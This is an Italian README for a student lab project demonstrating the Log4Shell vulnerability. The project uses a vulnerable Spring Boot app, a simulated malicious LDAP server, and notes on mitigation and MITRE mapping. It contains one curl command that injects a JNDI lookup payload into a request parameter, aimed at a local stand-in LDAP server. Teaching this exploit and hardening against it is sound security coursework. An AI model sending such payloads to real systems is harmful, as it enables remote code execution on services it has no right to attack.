
Demo dell'exploit Log4Shell (CVE-2021-44228) per SEAS 8405. Include un'app Spring Boot vulnerabile, un server LDAP fittizio, configurazione Docker, mappatura MITRE, risposta agli incidenti e una registrazione completa dello schermo.
Questo progetto dimostra lo sfruttamento e la mitigazione della vulnerabilità Log4Shell (CVE-2021-44228) utilizzando un'applicazione web Java containerizzata con Log4j 2.14.1 vulnerabile. La configurazione include anche un server LDAP dannoso simulato per dimostrare il percorso di attacco di iniezione JNDI.
Dopo lo sfruttamento, il sistema viene indurito aggiornando Log4j, validando l'input e applicando le raccomandazioni MITRE D3FEND e ATT&CK.
log4shell-homework9/
├── docker-compose.yml
├── Dockerfile
├── pom.xml
├── ldap_server.py
├── src/...
├── architecture_diagram.png
├── README.md
├── mitigation_report.pdf
docker build -t vulnerable-app .
docker-compose up
L'app sarà in esecuzione su:
http://localhost:8080
python3 ldap_server.py
Invia una richiesta come questa all'app:
curl http://localhost:8080?input=${jndi:ldap://localhost:8000/Exploit}
Il server LDAP dovrebbe ricevere la richiesta (questo simula l'exploit JNDI).
Dopo aver dimostrato l'attacco, il sistema è stato protetto:
${jndi:...})Vedere mitigation_report.pdf per:
Se il video non è caricato direttamente, è disponibile al link nella relazione.
Serpil Rivas
SEAS 8405 – Architetture di cybersecurity
Maggio 2025